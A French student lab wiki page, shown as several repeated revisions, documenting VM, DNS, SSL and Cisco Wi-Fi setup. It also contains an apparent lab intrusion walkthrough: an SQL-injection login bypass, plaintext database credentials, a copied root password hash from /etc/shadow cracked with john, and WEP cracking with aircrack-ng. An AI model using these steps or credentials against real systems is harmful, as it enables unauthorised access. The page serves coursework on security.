pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom du réseau sans fil: wlan0mon<br />
<br />
airmon-ng start wlan0mon<br />
<br />
On scanne les réseaux :<br />
airodump-ng --encrypte wep wlan0mon<br />
<br />
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.<br />
<br />
[[Fichier:capturewep1.png|600px]]<br />
<br />
On lance avec la commande :<br />
<br />
airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon<br />
<br />
aircrack-ng -z testwep-01.cap<br />
<br />
[[Fichier:capturewep2.png|600px]]</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=54495
TP sysres IMA5sc 2020/2021 G7
2020-12-14T14:08:57Z
<p>Nekhlas- : /* Sur la machine virtuelle */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
www IN CNAME ns1<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
<br />
Puis ajouter dans newaliases<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
<br />
<br />
Installation de mailx pour lire les mails reçus<br />
apt-install bsd-mailx<br />
Pour consulter le mail de vérification<br />
mailx admin<br />
<br />
<br />
verifications:<br />
host -t soa girolle.site ns6.gandi.net<br />
<br />
=== Sécurisation par certificat SSL ===<br />
<br />
Génération du CSR à l'aide d'openssl<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr<br />
<br />
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt<br />
<br />
Configuration du serveur apache2<br />
<br />
Activation du ssl sur apache2 <br />
ae2enmod ssl<br />
<br />
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available<br />
<VirtualHost *:80> <br />
ServerName www.girolle.site <br />
Redirect / https://www.girolle.site <br />
.... <br />
</VirtualHost> <br />
<br />
<VirtualHost 193.48.57.182:443><br />
DocumentRoot /var/www/html2<br />
ServerName girolle.site<br />
SSLEngine on<br />
SSLCertificateFile /root/girolle.site.crt<br />
SSLCertificateKeyFile /root/girolle.site.key<br />
SSLCertificateChainFile /root/GandiCA.pem<br />
</VirtualHost><br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom du réseau sans fil: wlan0mon<br />
<br />
airmon-ng start wlan0mon<br />
<br />
On scanne les réseaux :<br />
airodump-ng --encrypte wep wlan0mon<br />
<br />
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.<br />
<br />
[[Fichier:capturewep1.png|600px]]<br />
<br />
On lance avec la commande :<br />
<br />
airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon<br />
<br />
aircrack-ng -z testwep-01.cap<br />
<br />
[[Fichier:capturewep2.png|600px]]</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=54494
TP sysres IMA5sc 2020/2021 G7
2020-12-14T14:07:43Z
<p>Nekhlas- : /* Sur la machine virtuelle */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
www IN CNAME ns1<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
<br />
Puis ajouter dans newaliases<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
<br />
<br />
Installation de mailx pour lire les mails reçus<br />
apt-install bsd-mailx<br />
Pour consulter le mail de vérification<br />
mailx admin<br />
<br />
=== Sécurisation par certificat SSL ===<br />
<br />
Génération du CSR à l'aide d'openssl<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr<br />
<br />
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt<br />
<br />
Configuration du serveur apache2<br />
<br />
Activation du ssl sur apache2 <br />
ae2enmod ssl<br />
<br />
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available<br />
<VirtualHost *:80> <br />
ServerName www.girolle.site <br />
Redirect / https://www.girolle.site <br />
.... <br />
</VirtualHost> <br />
<br />
<VirtualHost 193.48.57.182:443><br />
DocumentRoot /var/www/html2<br />
ServerName girolle.site<br />
SSLEngine on<br />
SSLCertificateFile /root/girolle.site.crt<br />
SSLCertificateKeyFile /root/girolle.site.key<br />
SSLCertificateChainFile /root/GandiCA.pem<br />
</VirtualHost><br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom du réseau sans fil: wlan0mon<br />
<br />
airmon-ng start wlan0mon<br />
<br />
On scanne les réseaux :<br />
airodump-ng --encrypte wep wlan0mon<br />
<br />
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.<br />
<br />
[[Fichier:capturewep1.png|600px]]<br />
<br />
On lance avec la commande :<br />
<br />
airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon<br />
<br />
aircrack-ng -z testwep-01.cap<br />
<br />
[[Fichier:capturewep2.png|600px]]</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53819
TP sysres IMA5sc 2020/2021 G7
2020-11-16T17:28:09Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom du réseau sans fil: wlan0mon<br />
<br />
airmon-ng start wlan0mon<br />
<br />
On scanne les réseaux :<br />
airodump-ng --encrypte wep wlan0mon<br />
<br />
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.<br />
<br />
photo<br />
<br />
On lance avec la commande :<br />
<br />
